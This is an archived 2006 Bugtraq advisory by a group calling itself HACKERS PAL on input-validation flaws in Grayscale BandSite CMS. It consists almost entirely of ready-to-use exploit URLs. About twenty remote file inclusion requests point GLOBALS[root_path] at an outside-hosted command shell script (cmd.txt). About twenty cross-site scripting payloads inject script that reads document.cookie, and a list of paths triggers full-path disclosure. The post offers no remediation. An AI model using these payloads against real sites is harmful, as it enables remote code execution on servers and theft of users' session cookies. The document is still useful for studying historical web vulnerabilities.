lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 21 Sep 2006 04:25:38 -0000
From: security@...or.net
To: bugtraq@...urityfocus.com
Subject: Grayscale BandSite CMS Multiple Input Validation Vulnerabilities

Hello,,

Grayscale BandSite CMS Multiple Input Validation Vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@...or.net

Romote Include
includes/content/contact_content.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addfliersform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
includes/content/contact_content.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addbioform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addwearmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addlyricsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addlinksform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addinterviewsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addgenmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addshowsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreviewsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addrelmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreleasepicform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreleaseform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addphotosform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addnewsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmerchpicform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmembioform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?


Xss
adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(document.cookie);</script>
adminpanel/includes/helpfiles/help_merch.php?the_band=<script>alert(document.cookie);</script>
adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>alert(document.cookie);</script>
adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><script>alert(document.cookie);</script>
adminpanel/includes/header.php?the_band=</title><script>alert(document.cookie);</script>
adminpanel/login_header.php?the_band=</title><script>alert(document.cookie);</script>
includes/content/bio_content.php?the_band=<Script>alert(document.cookie);</script>
includes/content/gbook_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/interview_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/links_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/lyrics_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/member_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/merch_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/mp3_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/news_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/pastshows_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/photo_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/releases_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/reviews_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/shows_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/signgbook_content.php?the_band=<script>alert(document.cookie);</script>
includes/footer.php?this_year=<script>alert(document.cookie);</script>



Full path
includes/content/ open any file on this directory ..

includes/shows_preview.php
adminpanel/configform.php?submit=1
adminpanel/includes/mailinglist/disphtmltbl.php
adminpanel/includes/mailinglist/dispxls.php
adminpanel/includes/mailinglist/sendshows.php
adminpanel/includes/previews/preview_bio.php
adminpanel/includes/previews/preview_genmerch.php
adminpanel/includes/previews/preview_fliers.php
adminpanel/includes/previews/preview_gbook.php
adminpanel/includes/previews/preview_interviews.php
adminpanel/includes/previews/preview_links.php
adminpanel/includes/previews/preview_lyrics.php
adminpanel/includes/previews/preview_membio.php
adminpanel/includes/previews/preview_merchphotos.php
adminpanel/includes/previews/preview_mp3s.php
adminpanel/includes/previews/preview_news.php
adminpanel/includes/previews/preview_photos.php
adminpanel/includes/previews/preview_releases.php
adminpanel/includes/previews/preview_relmerch.php
adminpanel/includes/previews/preview_relphotos.php
adminpanel/includes/previews/preview_reviews.php
adminpanel/includes/previews/preview_shows.php
adminpanel/includes/previews/preview_wearmerch.php
adminpanel/includes/change_forms/change_bio.php
adminpanel/includes/change_forms/change_fliers.php
adminpanel/includes/change_forms/change_gbook.php
adminpanel/includes/change_forms/change_gen_merch.php
adminpanel/includes/change_forms/change_interview.php
adminpanel/includes/change_forms/change_links.php
adminpanel/includes/change_forms/change_lyrics.php
adminpanel/includes/change_forms/change_members.php
adminpanel/includes/change_forms/change_merch.php
adminpanel/includes/change_forms/change_merch_pic.php
adminpanel/includes/change_forms/change_mp3s.php
adminpanel/includes/change_forms/change_news.php
adminpanel/includes/change_forms/change_photos.php
adminpanel/includes/change_forms/change_rel_merch.php
adminpanel/includes/change_forms/change_rel_pic.php
adminpanel/includes/change_forms/change_releases.php
adminpanel/includes/change_forms/change_reviews.php
adminpanel/includes/change_forms/change_shows.php
adminpanel/includes/change_forms/change_wear_merch.php


WwW.SoQoR.NeT

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ